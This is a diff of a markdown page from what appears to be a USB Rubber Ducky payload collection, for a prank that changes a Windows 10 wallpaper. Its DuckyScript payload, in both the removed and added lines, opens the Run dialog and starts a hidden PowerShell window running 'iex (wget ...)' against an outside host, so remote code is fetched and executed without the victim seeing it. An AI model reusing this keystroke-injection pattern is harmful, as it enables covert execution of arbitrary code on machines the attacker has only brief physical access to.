abhinavvv03/Rubber-Duckey/Change-desktop-background-(win10).md

 Pre-written and execution-ready code:

 If you do not have access to a web server and want to get this running, here is pre-uploaded code.
-The bitlink points to [this gist](https://gist.github.com/judge2020/034d6201d6b24f079e0d692bea3e92b0) containing the PS code, and the image is hosted on github directly.
+Code is at [this gist](https://gist.github.com/judge2020/034d6201d6b24f079e0d692bea3e92b0) containing the PS code, and the image is hosted on GitHub directly.

+By default, it goes to an My Little Pony image, however you can set the 'image' GET parameter to change it at will.
+Eg change `https://judge.sh/wallpaper.php` to 'https://judge.sh/wallpaper.php?image=https://imgur.com/test.png'.
 ```
-SLEEP 600
+SLEEP 1000
 GUI r
-DELAY 150
+DELAY 250
-STRING powershell -windowstyle hidden iex (wget http://bit.ly/2f1uwGD)
+STRING powershell -windowstyle hidden iex (wget https://judge.sh/wallpaper.php)
 ENTER
 ```

+Below is original text
+---

 GET THE CODE SNIPS HERE: